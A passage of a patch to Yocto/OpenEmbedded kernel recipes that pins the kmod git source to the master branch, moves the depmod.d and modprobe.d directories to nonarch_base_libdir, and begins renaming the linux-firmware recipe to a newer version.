--- a/meta/recipes-kernel/kmod/kmod.inc
+++ b/meta/recipes-kernel/kmod/kmod.inc
@@ -19,7 +19,7 @@ SRCREV = "1ccfe994287119cc6cef37a7ca4c529d89de4b95"
# Lookout for PV bump too when SRCREV is changed
PV = "28"
-SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \
+SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git;branch=master \
file://depmod-search.conf \
file://avoid_parallel_tests.patch \
"
diff --git a/meta/recipes-kernel/kmod/kmod_git.bb b/meta/recipes-kernel/kmod/kmod_git.bb
index 4f2b037f2f8..f6fe049d923 100644
--- a/meta/recipes-kernel/kmod/kmod_git.bb
+++ b/meta/recipes-kernel/kmod/kmod_git.bb
@@ -24,13 +24,13 @@ do_install_append () {
lnr ${D}${base_bindir}/kmod ${D}${base_sbindir}/${tool}
done
# configuration directories
- install -dm755 ${D}${base_libdir}/depmod.d
- install -dm755 ${D}${base_libdir}/modprobe.d
+ install -dm755 ${D}${nonarch_base_libdir}/depmod.d
+ install -dm755 ${D}${nonarch_base_libdir}/modprobe.d
install -dm755 ${D}${sysconfdir}/depmod.d
install -dm755 ${D}${sysconfdir}/modprobe.d
# install depmod.d file for search/ dir
- install -Dm644 "${WORKDIR}/depmod-search.conf" "${D}${base_libdir}/depmod.d/search.conf"
+ install -Dm644 "${WORKDIR}/depmod-search.conf" "${D}${nonarch_base_libdir}/depmod.d/search.conf"
}
do_compile_prepend() {
@@ -57,6 +57,6 @@ ALTERNATIVE_LINK_NAME[depmod] = "${base_sbindir}/depmod"
PACKAGES =+ "libkmod"
FILES_libkmod = "${base_libdir}/libkmod*${SOLIBS} ${libdir}/libkmod*${SOLIBS}"
-FILES_${PN} += "${base_libdir}/depmod.d ${base_libdir}/modprobe.d"
+FILES_${PN} += "${nonarch_base_libdir}/depmod.d ${nonarch_base_libdir}/modprobe.d"
BBCLASSEXTEND = "nativesdk"
diff --git a/meta/recipes-kernel/linux-firmware/linux-firmware_20210511.bb b/meta/recipes-kernel/linux-firmware/linux-firmware_20211027.bb
index 26091fba707..76aed9d4435 100644
--- a/meta/recipes-kernel/linux-firmware/linux-firmware_20210511.bb
+++ b/